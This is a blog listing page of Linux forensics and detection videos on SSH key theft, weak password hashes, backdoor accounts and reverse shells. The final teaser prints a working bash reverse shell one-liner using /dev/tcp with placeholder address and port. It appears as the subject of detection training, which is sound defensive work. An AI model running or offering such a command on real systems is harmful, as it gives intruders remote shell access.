Blog

Unsecured and Unencrypted SSH Private Key Threats on Linux

Videos
Education
Linux Forensics
December 08, 2024

Unsecured and unencrypted SSH private keys are a major security threat on Linux. In this video we go over how easy unsecured SSH private keys can be stolen by intruders to use for lateral movement.…

Linux Obsolete Password Hash Risks

Videos
Linux Forensics
Malware
Education
December 05, 2024

Obsolete password hashes on Linux expose users to brute force attack. Legacy password hashes have included MD5 which can have billions of attempts a second tried against it by GPU based crackers.…

Linux nologin Shell Rename Backdoor Attack Detection and Forensics

Videos
Linux Forensics
Malware
Education
December 04, 2024

Ever wondered what would happen if you replaced the Linux /sbin/nologin with a valid shell? Attackers have and it gives them a persistent backdoor on supposedly disabled accounts. In this video we go…

Linux Default User Password Attack Detection and Forensics

Videos
Linux Forensics
Malware
Education
December 03, 2024

Linux ships with default users disabled. But, attackers can activate these accounts to allow backdoor access that can hide for a long time. In this video we discuss this threat, how to find it with…

Linux Duplicate User Password Hash Attack

Videos
Linux Forensics
Malware
Education
December 02, 2024

Duplicate password hashes on Linux are a tactic for attackers to drop backdoor accounts in an automated way. In this video we explain what a duplicate password hash attack is, and how you can find it…

Linux Reverse Shell Detection and Forensics

Videos
Education
Linux Forensics
December 02, 2024

In this video, we cover how to investigate one of our favorite reverse shells on Linux: bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1 This simple command will launch a shell from the victim system to…